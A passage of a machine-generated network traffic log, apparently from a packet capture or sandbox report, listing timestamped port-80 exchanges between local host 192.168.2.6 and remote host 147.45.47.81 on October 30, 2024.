                                                              Oct 30, 2024 15:44:45.988321066 CET8049995147.45.47.81192.168.2.6
                                                              Oct 30, 2024 15:44:45.988328934 CET4999580192.168.2.6147.45.47.81
                                                              Oct 30, 2024 15:44:45.988332033 CET8049995147.45.47.81192.168.2.6
                                                              Oct 30, 2024 15:44:45.988339901 CET8049995147.45.47.81192.168.2.6
                                                              Oct 30, 2024 15:44:45.988346100 CET8049995147.45.47.81192.168.2.6
                                                              Oct 30, 2024 15:44:45.988348007 CET4999580192.168.2.6147.45.47.81
                                                              Oct 30, 2024 15:44:45.988352060 CET8049995147.45.47.81192.168.2.6
                                                              Oct 30, 2024 15:44:45.988358974 CET8049995147.45.47.81192.168.2.6
                                                              Oct 30, 2024 15:44:45.988363981 CET8049995147.45.47.81192.168.2.6
                                                              Oct 30, 2024 15:44:45.988370895 CET8049995147.45.47.81192.168.2.6
                                                              Oct 30, 2024 15:44:45.988426924 CET4999580192.168.2.6147.45.47.81
                                                              Oct 30, 2024 15:44:45.988476992 CET4999580192.168.2.6147.45.47.81
                                                              Oct 30, 2024 15:44:45.989120007 CET8049995147.45.47.81192.168.2.6
                                                              Oct 30, 2024 15:44:45.989161968 CET4999580192.168.2.6147.45.47.81
                                                              Oct 30, 2024 15:44:45.989185095 CET8049995147.45.47.81192.168.2.6
                                                              Oct 30, 2024 15:44:45.989360094 CET8049995147.45.47.81192.168.2.6
                                                              Oct 30, 2024 15:44:45.989371061 CET8049995147.45.47.81192.168.2.6
                                                              Oct 30, 2024 15:44:45.989382029 CET8049995147.45.47.81192.168.2.6
                                                              Oct 30, 2024 15:44:45.989399910 CET4999580192.168.2.6147.45.47.81
                                                              Oct 30, 2024 15:44:45.989427090 CET4999580192.168.2.6147.45.47.81
                                                              Oct 30, 2024 15:44:45.989464998 CET8049995147.45.47.81192.168.2.6
                                                              Oct 30, 2024 15:44:45.989478111 CET8049995147.45.47.81192.168.2.6
                                                              Oct 30, 2024 15:44:45.989489079 CET8049995147.45.47.81192.168.2.6
                                                              Oct 30, 2024 15:44:45.989500046 CET8049995147.45.47.81192.168.2.6
                                                              Oct 30, 2024 15:44:45.989501953 CET4999580192.168.2.6147.45.47.81
                                                              Oct 30, 2024 15:44:45.989511967 CET8049995147.45.47.81192.168.2.6
                                                              Oct 30, 2024 15:44:45.989523888 CET8049995147.45.47.81192.168.2.6
                                                              Oct 30, 2024 15:44:45.989536047 CET8049995147.45.47.81192.168.2.6
                                                              Oct 30, 2024 15:44:45.989551067 CET4999580192.168.2.6147.45.47.81
                                                              Oct 30, 2024 15:44:45.989574909 CET4999580192.168.2.6147.45.47.81
                                                              Oct 30, 2024 15:44:45.990216017 CET8049995147.45.47.81192.168.2.6
                                                              Oct 30, 2024 15:44:45.990263939 CET4999580192.168.2.6147.45.47.81
                                                              Oct 30, 2024 15:44:45.990356922 CET8049995147.45.47.81192.168.2.6
                                                              Oct 30, 2024 15:44:45.990369081 CET8049995147.45.47.81192.168.2.6
                                                              Oct 30, 2024 15:44:45.990380049 CET8049995147.45.47.81192.168.2.6
                                                              Oct 30, 2024 15:44:45.990391016 CET8049995147.45.47.81192.168.2.6
                                                              Oct 30, 2024 15:44:45.990402937 CET4999580192.168.2.6147.45.47.81
                                                              Oct 30, 2024 15:44:45.990405083 CET8049995147.45.47.81192.168.2.6
                                                              Oct 30, 2024 15:44:45.990417004 CET8049995147.45.47.81192.168.2.6
                                                              Oct 30, 2024 15:44:45.990427017 CET4999580192.168.2.6147.45.47.81
                                                              Oct 30, 2024 15:44:45.990430117 CET8049995147.45.47.81192.168.2.6
                                                              Oct 30, 2024 15:44:45.990441084 CET8049995147.45.47.81192.168.2.6
                                                              Oct 30, 2024 15:44:45.990451097 CET4999580192.168.2.6147.45.47.81
                                                              Oct 30, 2024 15:44:45.990453005 CET8049995147.45.47.81192.168.2.6
                                                              Oct 30, 2024 15:44:45.990475893 CET4999580192.168.2.6147.45.47.81
                                                              Oct 30, 2024 15:44:45.990706921 CET4999580192.168.2.6147.45.47.81
                                                              Oct 30, 2024 15:44:45.991002083 CET8049995147.45.47.81192.168.2.6
                                                              Oct 30, 2024 15:44:45.991039991 CET4999580192.168.2.6147.45.47.81
                                                              Oct 30, 2024 15:44:45.991111994 CET8049995147.45.47.81192.168.2.6
                                                              Oct 30, 2024 15:44:45.991122961 CET8049995147.45.47.81192.168.2.6
                                                              Oct 30, 2024 15:44:45.991133928 CET8049995147.45.47.81192.168.2.6
                                                              Oct 30, 2024 15:44:45.991154909 CET8049995147.45.47.81192.168.2.6
                                                              Oct 30, 2024 15:44:45.991158962 CET4999580192.168.2.6147.45.47.81
                                                              Oct 30, 2024 15:44:45.991168022 CET8049995147.45.47.81192.168.2.6
                                                              Oct 30, 2024 15:44:45.991178989 CET8049995147.45.47.81192.168.2.6
                                                              Oct 30, 2024 15:44:45.991189957 CET8049995147.45.47.81192.168.2.6
                                                              Oct 30, 2024 15:44:45.991192102 CET4999580192.168.2.6147.45.47.81
                                                              Oct 30, 2024 15:44:45.991202116 CET8049995147.45.47.81192.168.2.6
                                                              Oct 30, 2024 15:44:45.991211891 CET4999580192.168.2.6147.45.47.81
                                                              Oct 30, 2024 15:44:45.991214037 CET8049995147.45.47.81192.168.2.6
                                                              Oct 30, 2024 15:44:45.991241932 CET4999580192.168.2.6147.45.47.81
                                                              Oct 30, 2024 15:44:45.991936922 CET8049995147.45.47.81192.168.2.6
                                                              Oct 30, 2024 15:44:45.992002964 CET4999580192.168.2.6147.45.47.81
                                                              Oct 30, 2024 15:44:45.992033005 CET8049995147.45.47.81192.168.2.6
                                                              Oct 30, 2024 15:44:45.992044926 CET8049995147.45.47.81192.168.2.6
                                                              Oct 30, 2024 15:44:45.992057085 CET8049995147.45.47.81192.168.2.6
                                                              Oct 30, 2024 15:44:45.992074013 CET8049995147.45.47.81192.168.2.6
                                                              Oct 30, 2024 15:44:45.992074013 CET4999580192.168.2.6147.45.47.81
                                                              Oct 30, 2024 15:44:45.992086887 CET8049995147.45.47.81192.168.2.6
                                                              Oct 30, 2024 15:44:45.992093086 CET8049995147.45.47.81192.168.2.6
                                                              Oct 30, 2024 15:44:45.992103100 CET8049995147.45.47.81192.168.2.6
                                                              Oct 30, 2024 15:44:45.992114067 CET8049995147.45.47.81192.168.2.6
                                                              Oct 30, 2024 15:44:45.992120981 CET4999580192.168.2.6147.45.47.81
                                                              Oct 30, 2024 15:44:45.992126942 CET8049995147.45.47.81192.168.2.6
                                                              Oct 30, 2024 15:44:45.992150068 CET4999580192.168.2.6147.45.47.81
                                                              Oct 30, 2024 15:44:45.992949963 CET8049995147.45.47.81192.168.2.6
                                                              Oct 30, 2024 15:44:45.992961884 CET8049995147.45.47.81192.168.2.6
                                                              Oct 30, 2024 15:44:45.992973089 CET8049995147.45.47.81192.168.2.6
                                                              Oct 30, 2024 15:44:45.992996931 CET4999580192.168.2.6147.45.47.81
                                                              Oct 30, 2024 15:44:45.993025064 CET4999580192.168.2.6147.45.47.81
                                                              Oct 30, 2024 15:44:45.993057013 CET8049995147.45.47.81192.168.2.6
                                                              Oct 30, 2024 15:44:45.993068933 CET8049995147.45.47.81192.168.2.6
                                                              Oct 30, 2024 15:44:45.993078947 CET8049995147.45.47.81192.168.2.6
                                                              Oct 30, 2024 15:44:45.993089914 CET8049995147.45.47.81192.168.2.6
                                                              Oct 30, 2024 15:44:45.993097067 CET4999580192.168.2.6147.45.47.81
                                                              Oct 30, 2024 15:44:45.993102074 CET8049995147.45.47.81192.168.2.6
                                                              Oct 30, 2024 15:44:45.993113041 CET8049995147.45.47.81192.168.2.6
                                                              Oct 30, 2024 15:44:45.993119955 CET4999580192.168.2.6147.45.47.81
                                                              Oct 30, 2024 15:44:45.993128061 CET8049995147.45.47.81192.168.2.6
                                                              Oct 30, 2024 15:44:45.993150949 CET4999580192.168.2.6147.45.47.81
                                                              Oct 30, 2024 15:44:45.993727922 CET8049995147.45.47.81192.168.2.6
                                                              Oct 30, 2024 15:44:45.993767977 CET8049995147.45.47.81192.168.2.6
                                                              Oct 30, 2024 15:44:45.993777037 CET4999580192.168.2.6147.45.47.81
                                                              Oct 30, 2024 15:44:45.993973017 CET8049995147.45.47.81192.168.2.6
                                                              Oct 30, 2024 15:44:45.993983984 CET8049995147.45.47.81192.168.2.6
                                                              Oct 30, 2024 15:44:45.993993998 CET8049995147.45.47.81192.168.2.6
                                                              Oct 30, 2024 15:44:45.994015932 CET4999580192.168.2.6147.45.47.81
                                                              Oct 30, 2024 15:44:45.994029999 CET8049995147.45.47.81192.168.2.6
                                                              Oct 30, 2024 15:44:45.994040966 CET8049995147.45.47.81192.168.2.6
                                                              Oct 30, 2024 15:44:45.994040966 CET4999580192.168.2.6147.45.47.81
                                                              Oct 30, 2024 15:44:45.994050980 CET8049995147.45.47.81192.168.2.6
                                                              Oct 30, 2024 15:44:45.994062901 CET8049995147.45.47.81192.168.2.6
                                                              Oct 30, 2024 15:44:45.994071007 CET4999580192.168.2.6147.45.47.81
                                                              Oct 30, 2024 15:44:45.994076014 CET8049995147.45.47.81192.168.2.6
                                                              Oct 30, 2024 15:44:45.994086981 CET8049995147.45.47.81192.168.2.6
                                                              Oct 30, 2024 15:44:45.994096041 CET4999580192.168.2.6147.45.47.81
                                                              Oct 30, 2024 15:44:45.994098902 CET8049995147.45.47.81192.168.2.6
                                                              Oct 30, 2024 15:44:45.994136095 CET4999580192.168.2.6147.45.47.81
                                                              Oct 30, 2024 15:44:45.994216919 CET4999580192.168.2.6147.45.47.81
                                                              Oct 30, 2024 15:44:45.994823933 CET8049995147.45.47.81192.168.2.6
                                                              Oct 30, 2024 15:44:45.994862080 CET4999580192.168.2.6147.45.47.81
                                                              Oct 30, 2024 15:44:45.994899988 CET8049995147.45.47.81192.168.2.6
                                                              Oct 30, 2024 15:44:45.994911909 CET8049995147.45.47.81192.168.2.6
                                                              Oct 30, 2024 15:44:45.994924068 CET8049995147.45.47.81192.168.2.6
                                                              Oct 30, 2024 15:44:45.994932890 CET8049995147.45.47.81192.168.2.6
                                                              Oct 30, 2024 15:44:45.994944096 CET4999580192.168.2.6147.45.47.81
                                                              Oct 30, 2024 15:44:45.994955063 CET8049995147.45.47.81192.168.2.6
                                                              Oct 30, 2024 15:44:45.994971037 CET4999580192.168.2.6147.45.47.81
                                                              Oct 30, 2024 15:44:45.994972944 CET8049995147.45.47.81192.168.2.6
                                                              Oct 30, 2024 15:44:45.994987011 CET8049995147.45.47.81192.168.2.6
                                                              Oct 30, 2024 15:44:45.994997978 CET8049995147.45.47.81192.168.2.6
                                                              Oct 30, 2024 15:44:45.995008945 CET4999580192.168.2.6147.45.47.81
                                                              Oct 30, 2024 15:44:45.995011091 CET8049995147.45.47.81192.168.2.6
                                                              Oct 30, 2024 15:44:45.995033979 CET4999580192.168.2.6147.45.47.81
                                                              Oct 30, 2024 15:44:45.995735884 CET8049995147.45.47.81192.168.2.6
                                                              Oct 30, 2024 15:44:45.995779037 CET4999580192.168.2.6147.45.47.81
                                                              Oct 30, 2024 15:44:45.995789051 CET8049995147.45.47.81192.168.2.6
                                                              Oct 30, 2024 15:44:45.995801926 CET8049995147.45.47.81192.168.2.6
                                                              Oct 30, 2024 15:44:45.995835066 CET4999580192.168.2.6147.45.47.81
                                                              Oct 30, 2024 15:44:45.995863914 CET8049995147.45.47.81192.168.2.6
                                                              Oct 30, 2024 15:44:45.995874882 CET8049995147.45.47.81192.168.2.6
                                                              Oct 30, 2024 15:44:45.995884895 CET8049995147.45.47.81192.168.2.6
                                                              Oct 30, 2024 15:44:45.995896101 CET8049995147.45.47.81192.168.2.6
                                                              Oct 30, 2024 15:44:45.995898962 CET4999580192.168.2.6147.45.47.81
                                                              Oct 30, 2024 15:44:45.995914936 CET8049995147.45.47.81192.168.2.6
                                                              Oct 30, 2024 15:44:45.995924950 CET8049995147.45.47.81192.168.2.6
                                                              Oct 30, 2024 15:44:45.995934010 CET4999580192.168.2.6147.45.47.81
                                                              Oct 30, 2024 15:44:45.995937109 CET8049995147.45.47.81192.168.2.6
                                                              Oct 30, 2024 15:44:45.995966911 CET4999580192.168.2.6147.45.47.81
                                                              Oct 30, 2024 15:44:45.996716022 CET8049995147.45.47.81192.168.2.6
                                                              Oct 30, 2024 15:44:45.996759892 CET4999580192.168.2.6147.45.47.81
                                                              Oct 30, 2024 15:44:45.996814013 CET8049995147.45.47.81192.168.2.6
                                                              Oct 30, 2024 15:44:45.996824980 CET8049995147.45.47.81192.168.2.6
                                                              Oct 30, 2024 15:44:45.996845007 CET8049995147.45.47.81192.168.2.6
                                                              Oct 30, 2024 15:44:45.996856928 CET8049995147.45.47.81192.168.2.6
                                                              Oct 30, 2024 15:44:45.996867895 CET8049995147.45.47.81192.168.2.6
                                                              Oct 30, 2024 15:44:45.996880054 CET8049995147.45.47.81192.168.2.6
                                                              Oct 30, 2024 15:44:45.996892929 CET8049995147.45.47.81192.168.2.6
                                                              Oct 30, 2024 15:44:45.996905088 CET8049995147.45.47.81192.168.2.6
                                                              Oct 30, 2024 15:44:45.996905088 CET4999580192.168.2.6147.45.47.81
                                                              Oct 30, 2024 15:44:45.996917009 CET8049995147.45.47.81192.168.2.6
                                                              Oct 30, 2024 15:44:45.996942043 CET4999580192.168.2.6147.45.47.81
                                                              Oct 30, 2024 15:44:45.996956110 CET4999580192.168.2.6147.45.47.81
                                                              Oct 30, 2024 15:44:45.997622013 CET8049995147.45.47.81192.168.2.6
                                                              Oct 30, 2024 15:44:45.997633934 CET8049995147.45.47.81192.168.2.6
                                                              Oct 30, 2024 15:44:45.997644901 CET8049995147.45.47.81192.168.2.6
                                                              Oct 30, 2024 15:44:45.997658968 CET4999580192.168.2.6147.45.47.81
                                                              Oct 30, 2024 15:44:45.997663021 CET8049995147.45.47.81192.168.2.6
                                                              Oct 30, 2024 15:44:45.997674942 CET8049995147.45.47.81192.168.2.6
                                                              Oct 30, 2024 15:44:45.997685909 CET4999580192.168.2.6147.45.47.81
                                                              Oct 30, 2024 15:44:45.997688055 CET8049995147.45.47.81192.168.2.6
                                                              Oct 30, 2024 15:44:45.997699976 CET8049995147.45.47.81192.168.2.6
                                                              Oct 30, 2024 15:44:45.997709990 CET4999580192.168.2.6147.45.47.81
                                                              Oct 30, 2024 15:44:45.997711897 CET8049995147.45.47.81192.168.2.6
                                                              Oct 30, 2024 15:44:45.997724056 CET8049995147.45.47.81192.168.2.6
                                                              Oct 30, 2024 15:44:45.997736931 CET8049995147.45.47.81192.168.2.6
                                                              Oct 30, 2024 15:44:45.997741938 CET4999580192.168.2.6147.45.47.81
                                                              Oct 30, 2024 15:44:45.997762918 CET4999580192.168.2.6147.45.47.81
                                                              Oct 30, 2024 15:44:45.998455048 CET8049995147.45.47.81192.168.2.6
                                                              Oct 30, 2024 15:44:45.998497009 CET4999580192.168.2.6147.45.47.81
                                                              Oct 30, 2024 15:44:45.998521090 CET8049995147.45.47.81192.168.2.6
                                                              Oct 30, 2024 15:44:45.998686075 CET8049995147.45.47.81192.168.2.6
                                                              Oct 30, 2024 15:44:45.998703003 CET8049995147.45.47.81192.168.2.6
                                                              Oct 30, 2024 15:44:45.998713017 CET8049995147.45.47.81192.168.2.6
                                                              Oct 30, 2024 15:44:45.998723984 CET4999580192.168.2.6147.45.47.81
                                                              Oct 30, 2024 15:44:45.998724937 CET8049995147.45.47.81192.168.2.6
                                                              Oct 30, 2024 15:44:45.998738050 CET8049995147.45.47.81192.168.2.6
                                                              Oct 30, 2024 15:44:45.998749018 CET8049995147.45.47.81192.168.2.6
                                                              Oct 30, 2024 15:44:45.998752117 CET4999580192.168.2.6147.45.47.81
                                                              Oct 30, 2024 15:44:45.998759985 CET8049995147.45.47.81192.168.2.6
                                                              Oct 30, 2024 15:44:45.998770952 CET8049995147.45.47.81192.168.2.6
                                                              Oct 30, 2024 15:44:45.998779058 CET4999580192.168.2.6147.45.47.81
                                                              Oct 30, 2024 15:44:45.998781919 CET8049995147.45.47.81192.168.2.6
                                                              Oct 30, 2024 15:44:45.998794079 CET8049995147.45.47.81192.168.2.6
                                                              Oct 30, 2024 15:44:45.998806000 CET8049995147.45.47.81192.168.2.6
                                                              Oct 30, 2024 15:44:45.998816967 CET8049995147.45.47.81192.168.2.6
                                                              Oct 30, 2024 15:44:45.998821020 CET4999580192.168.2.6147.45.47.81
                                                              Oct 30, 2024 15:44:45.998830080 CET8049995147.45.47.81192.168.2.6
                                                              Oct 30, 2024 15:44:45.998831034 CET4999580192.168.2.6147.45.47.81
                                                              Oct 30, 2024 15:44:45.998850107 CET4999580192.168.2.6147.45.47.81
                                                              Oct 30, 2024 15:44:45.998866081 CET4999580192.168.2.6147.45.47.81
                                                              Oct 30, 2024 15:44:45.999600887 CET8049995147.45.47.81192.168.2.6
                                                              Oct 30, 2024 15:44:45.999701023 CET8049995147.45.47.81192.168.2.6
                                                              Oct 30, 2024 15:44:45.999711037 CET8049995147.45.47.81192.168.2.6
                                                              Oct 30, 2024 15:44:45.999717951 CET8049995147.45.47.81192.168.2.6
                                                              Oct 30, 2024 15:44:45.999722958 CET8049995147.45.47.81192.168.2.6
                                                              Oct 30, 2024 15:44:45.999732018 CET8049995147.45.47.81192.168.2.6
                                                              Oct 30, 2024 15:44:45.999742031 CET8049995147.45.47.81192.168.2.6
                                                              Oct 30, 2024 15:44:45.999752998 CET8049995147.45.47.81192.168.2.6
                                                              Oct 30, 2024 15:44:45.999763012 CET4999580192.168.2.6147.45.47.81
                                                              Oct 30, 2024 15:44:45.999771118 CET8049995147.45.47.81192.168.2.6
                                                              Oct 30, 2024 15:44:45.999783039 CET8049995147.45.47.81192.168.2.6
                                                              Oct 30, 2024 15:44:45.999790907 CET4999580192.168.2.6147.45.47.81
                                                              Oct 30, 2024 15:44:45.999794006 CET8049995147.45.47.81192.168.2.6
                                                              Oct 30, 2024 15:44:45.999806881 CET8049995147.45.47.81192.168.2.6
                                                              Oct 30, 2024 15:44:45.999820948 CET8049995147.45.47.81192.168.2.6
                                                              Oct 30, 2024 15:44:45.999829054 CET4999580192.168.2.6147.45.47.81
                                                              Oct 30, 2024 15:44:45.999851942 CET4999580192.168.2.6147.45.47.81
                                                              Oct 30, 2024 15:44:46.000431061 CET8049995147.45.47.81192.168.2.6
                                                              Oct 30, 2024 15:44:46.000473976 CET4999580192.168.2.6147.45.47.81
                                                              Oct 30, 2024 15:44:46.000540972 CET8049995147.45.47.81192.168.2.6
                                                              Oct 30, 2024 15:44:46.000551939 CET8049995147.45.47.81192.168.2.6
                                                              Oct 30, 2024 15:44:46.000564098 CET8049995147.45.47.81192.168.2.6
                                                              Oct 30, 2024 15:44:46.000575066 CET8049995147.45.47.81192.168.2.6
                                                              Oct 30, 2024 15:44:46.000587940 CET4999580192.168.2.6147.45.47.81
                                                              Oct 30, 2024 15:44:46.000597000 CET8049995147.45.47.81192.168.2.6
                                                              Oct 30, 2024 15:44:46.000613928 CET8049995147.45.47.81192.168.2.6
                                                              Oct 30, 2024 15:44:46.000614882 CET4999580192.168.2.6147.45.47.81
                                                              Oct 30, 2024 15:44:46.000626087 CET8049995147.45.47.81192.168.2.6
                                                              Oct 30, 2024 15:44:46.000637054 CET8049995147.45.47.81192.168.2.6
                                                              Oct 30, 2024 15:44:46.000649929 CET8049995147.45.47.81192.168.2.6
                                                              Oct 30, 2024 15:44:46.000653982 CET4999580192.168.2.6147.45.47.81
                                                              Oct 30, 2024 15:44:46.000660896 CET8049995147.45.47.81192.168.2.6
                                                              Oct 30, 2024 15:44:46.000674009 CET8049995147.45.47.81192.168.2.6
                                                              Oct 30, 2024 15:44:46.000675917 CET4999580192.168.2.6147.45.47.81
                                                              Oct 30, 2024 15:44:46.000685930 CET8049995147.45.47.81192.168.2.6
                                                              Oct 30, 2024 15:44:46.000705957 CET4999580192.168.2.6147.45.47.81
                                                              Oct 30, 2024 15:44:46.000724077 CET4999580192.168.2.6147.45.47.81
                                                              Oct 30, 2024 15:44:46.001512051 CET8049995147.45.47.81192.168.2.6
                                                              Oct 30, 2024 15:44:46.001688004 CET8049995147.45.47.81192.168.2.6
                                                              Oct 30, 2024 15:44:46.001699924 CET8049995147.45.47.81192.168.2.6
                                                              Oct 30, 2024 15:44:46.001710892 CET8049995147.45.47.81192.168.2.6
                                                              Oct 30, 2024 15:44:46.001722097 CET8049995147.45.47.81192.168.2.6
                                                              Oct 30, 2024 15:44:46.001728058 CET4999580192.168.2.6147.45.47.81
                                                              Oct 30, 2024 15:44:46.001734018 CET8049995147.45.47.81192.168.2.6
                                                              Oct 30, 2024 15:44:46.001744986 CET8049995147.45.47.81192.168.2.6
                                                              Oct 30, 2024 15:44:46.001749992 CET4999580192.168.2.6147.45.47.81
                                                              Oct 30, 2024 15:44:46.001758099 CET8049995147.45.47.81192.168.2.6
                                                              Oct 30, 2024 15:44:46.001770973 CET8049995147.45.47.81192.168.2.6
                                                              Oct 30, 2024 15:44:46.001782894 CET8049995147.45.47.81192.168.2.6
                                                              Oct 30, 2024 15:44:46.001790047 CET4999580192.168.2.6147.45.47.81
                                                              Oct 30, 2024 15:44:46.001796007 CET8049995147.45.47.81192.168.2.6
                                                              Oct 30, 2024 15:44:46.001807928 CET8049995147.45.47.81192.168.2.6
                                                              Oct 30, 2024 15:44:46.001813889 CET4999580192.168.2.6147.45.47.81
                                                              Oct 30, 2024 15:44:46.001821995 CET8049995147.45.47.81192.168.2.6
                                                              Oct 30, 2024 15:44:46.001828909 CET4999580192.168.2.6147.45.47.81
                                                              Oct 30, 2024 15:44:46.001847982 CET4999580192.168.2.6147.45.47.81
                                                              Oct 30, 2024 15:44:46.002310038 CET8049995147.45.47.81192.168.2.6
                                                              Oct 30, 2024 15:44:46.002355099 CET4999580192.168.2.6147.45.47.81
                                                              Oct 30, 2024 15:44:46.002360106 CET8049995147.45.47.81192.168.2.6
                                                              Oct 30, 2024 15:44:46.002371073 CET8049995147.45.47.81192.168.2.6
                                                              Oct 30, 2024 15:44:46.002381086 CET8049995147.45.47.81192.168.2.6
                                                              Oct 30, 2024 15:44:46.002404928 CET4999580192.168.2.6147.45.47.81
                                                              Oct 30, 2024 15:44:46.002410889 CET8049995147.45.47.81192.168.2.6
                                                              Oct 30, 2024 15:44:46.002423048 CET8049995147.45.47.81192.168.2.6
                                                              Oct 30, 2024 15:44:46.002435923 CET8049995147.45.47.81192.168.2.6
                                                              Oct 30, 2024 15:44:46.002449036 CET4999580192.168.2.6147.45.47.81
                                                              Oct 30, 2024 15:44:46.002449036 CET8049995147.45.47.81192.168.2.6
                                                              Oct 30, 2024 15:44:46.002458096 CET8049995147.45.47.81192.168.2.6
                                                              Oct 30, 2024 15:44:46.002463102 CET8049995147.45.47.81192.168.2.6
                                                              Oct 30, 2024 15:44:46.002469063 CET8049995147.45.47.81192.168.2.6
                                                              Oct 30, 2024 15:44:46.002474070 CET8049995147.45.47.81192.168.2.6
                                                              Oct 30, 2024 15:44:46.002485991 CET8049995147.45.47.81192.168.2.6
                                                              Oct 30, 2024 15:44:46.003038883 CET4999580192.168.2.6147.45.47.81
                                                              Oct 30, 2024 15:44:46.003283978 CET8049995147.45.47.81192.168.2.6
                                                              Oct 30, 2024 15:44:46.003294945 CET8049995147.45.47.81192.168.2.6
                                                              Oct 30, 2024 15:44:46.003307104 CET8049995147.45.47.81192.168.2.6
                                                              Oct 30, 2024 15:44:46.003333092 CET8049995147.45.47.81192.168.2.6
                                                              Oct 30, 2024 15:44:46.003346920 CET8049995147.45.47.81192.168.2.6
                                                              Oct 30, 2024 15:44:46.003359079 CET8049995147.45.47.81192.168.2.6
                                                              Oct 30, 2024 15:44:46.003371000 CET8049995147.45.47.81192.168.2.6
                                                              Oct 30, 2024 15:44:46.003387928 CET4999580192.168.2.6147.45.47.81
                                                              Oct 30, 2024 15:44:46.003420115 CET4999580192.168.2.6147.45.47.81
                                                              Oct 30, 2024 15:44:46.003427029 CET8049995147.45.47.81192.168.2.6
                                                              Oct 30, 2024 15:44:46.003437996 CET8049995147.45.47.81192.168.2.6
                                                              Oct 30, 2024 15:44:46.003449917 CET8049995147.45.47.81192.168.2.6
                                                              Oct 30, 2024 15:44:46.003460884 CET8049995147.45.47.81192.168.2.6
                                                              Oct 30, 2024 15:44:46.003473997 CET8049995147.45.47.81192.168.2.6
                                                              Oct 30, 2024 15:44:46.003485918 CET8049995147.45.47.81192.168.2.6
                                                              Oct 30, 2024 15:44:46.003488064 CET4999580192.168.2.6147.45.47.81
                                                              Oct 30, 2024 15:44:46.003508091 CET4999580192.168.2.6147.45.47.81
                                                              Oct 30, 2024 15:44:46.004004002 CET4999580192.168.2.6147.45.47.81
                                                              Oct 30, 2024 15:44:46.004307032 CET8049995147.45.47.81192.168.2.6
                                                              Oct 30, 2024 15:44:46.004318953 CET8049995147.45.47.81192.168.2.6
                                                              Oct 30, 2024 15:44:46.004328966 CET8049995147.45.47.81192.168.2.6
                                                              Oct 30, 2024 15:44:46.004350901 CET4999580192.168.2.6147.45.47.81
                                                              Oct 30, 2024 15:44:46.004368067 CET4999580192.168.2.6147.45.47.81
                                                              Oct 30, 2024 15:44:46.004374981 CET8049995147.45.47.81192.168.2.6
                                                              Oct 30, 2024 15:44:46.004386902 CET8049995147.45.47.81192.168.2.6
                                                              Oct 30, 2024 15:44:46.004405022 CET8049995147.45.47.81192.168.2.6
                                                              Oct 30, 2024 15:44:46.004419088 CET8049995147.45.47.81192.168.2.6
                                                              Oct 30, 2024 15:44:46.004431963 CET4999580192.168.2.6147.45.47.81
                                                              Oct 30, 2024 15:44:46.004458904 CET4999580192.168.2.6147.45.47.81
                                                              Oct 30, 2024 15:44:46.004466057 CET8049995147.45.47.81192.168.2.6
                                                              Oct 30, 2024 15:44:46.004477024 CET8049995147.45.47.81192.168.2.6
                                                              Oct 30, 2024 15:44:46.004487991 CET8049995147.45.47.81192.168.2.6
                                                              Oct 30, 2024 15:44:46.004498959 CET8049995147.45.47.81192.168.2.6
                                                              Oct 30, 2024 15:44:46.004512072 CET8049995147.45.47.81192.168.2.6
                                                              Oct 30, 2024 15:44:46.004518032 CET4999580192.168.2.6147.45.47.81
                                                              Oct 30, 2024 15:44:46.004524946 CET8049995147.45.47.81192.168.2.6
                                                              Oct 30, 2024 15:44:46.004538059 CET4999580192.168.2.6147.45.47.81
                                                              Oct 30, 2024 15:44:46.004565001 CET4999580192.168.2.6147.45.47.81
                                                              Oct 30, 2024 15:44:46.005112886 CET8049995147.45.47.81192.168.2.6
                                                              Oct 30, 2024 15:44:46.005132914 CET8049995147.45.47.81192.168.2.6
                                                              Oct 30, 2024 15:44:46.005146027 CET8049995147.45.47.81192.168.2.6
                                                              Oct 30, 2024 15:44:46.005168915 CET4999580192.168.2.6147.45.47.81
                                                              Oct 30, 2024 15:44:46.005194902 CET8049995147.45.47.81192.168.2.6
                                                              Oct 30, 2024 15:44:46.005207062 CET8049995147.45.47.81192.168.2.6
                                                              Oct 30, 2024 15:44:46.005217075 CET8049995147.45.47.81192.168.2.6
                                                              Oct 30, 2024 15:44:46.005229950 CET8049995147.45.47.81192.168.2.6
                                                              Oct 30, 2024 15:44:46.005234003 CET4999580192.168.2.6147.45.47.81
                                                              Oct 30, 2024 15:44:46.005259991 CET4999580192.168.2.6147.45.47.81
                                                              Oct 30, 2024 15:44:46.005286932 CET8049995147.45.47.81192.168.2.6
                                                              Oct 30, 2024 15:44:46.005299091 CET8049995147.45.47.81192.168.2.6
                                                              Oct 30, 2024 15:44:46.005311012 CET8049995147.45.47.81192.168.2.6
                                                              Oct 30, 2024 15:44:46.005321980 CET8049995147.45.47.81192.168.2.6
                                                              Oct 30, 2024 15:44:46.005326986 CET4999580192.168.2.6147.45.47.81
                                                              Oct 30, 2024 15:44:46.005335093 CET8049995147.45.47.81192.168.2.6
                                                              Oct 30, 2024 15:44:46.005347967 CET8049995147.45.47.81192.168.2.6
                                                              Oct 30, 2024 15:44:46.005354881 CET4999580192.168.2.6147.45.47.81
                                                              Oct 30, 2024 15:44:46.005374908 CET4999580192.168.2.6147.45.47.81
                                                              Oct 30, 2024 15:44:46.006064892 CET8049995147.45.47.81192.168.2.6
                                                              Oct 30, 2024 15:44:46.006076097 CET8049995147.45.47.81192.168.2.6
                                                              Oct 30, 2024 15:44:46.006088018 CET8049995147.45.47.81192.168.2.6
                                                              Oct 30, 2024 15:44:46.006123066 CET8049995147.45.47.81192.168.2.6
                                                              Oct 30, 2024 15:44:46.006134987 CET8049995147.45.47.81192.168.2.6
                                                              Oct 30, 2024 15:44:46.006145954 CET8049995147.45.47.81192.168.2.6
                                                              Oct 30, 2024 15:44:46.006156921 CET8049995147.45.47.81192.168.2.6
                                                              Oct 30, 2024 15:44:46.006159067 CET4999580192.168.2.6147.45.47.81
                                                              Oct 30, 2024 15:44:46.006171942 CET8049995147.45.47.81192.168.2.6
                                                              Oct 30, 2024 15:44:46.006175041 CET4999580192.168.2.6147.45.47.81
                                                              Oct 30, 2024 15:44:46.006190062 CET8049995147.45.47.81192.168.2.6
                                                              Oct 30, 2024 15:44:46.006200075 CET4999580192.168.2.6147.45.47.81
                                                              Oct 30, 2024 15:44:46.006201982 CET8049995147.45.47.81192.168.2.6
                                                              Oct 30, 2024 15:44:46.006213903 CET8049995147.45.47.81192.168.2.6
                                                              Oct 30, 2024 15:44:46.006227016 CET8049995147.45.47.81192.168.2.6
                                                              Oct 30, 2024 15:44:46.006228924 CET4999580192.168.2.6147.45.47.81
                                                              Oct 30, 2024 15:44:46.006238937 CET8049995147.45.47.81192.168.2.6
                                                              Oct 30, 2024 15:44:46.006254911 CET4999580192.168.2.6147.45.47.81
                                                              Oct 30, 2024 15:44:46.006278038 CET4999580192.168.2.6147.45.47.81
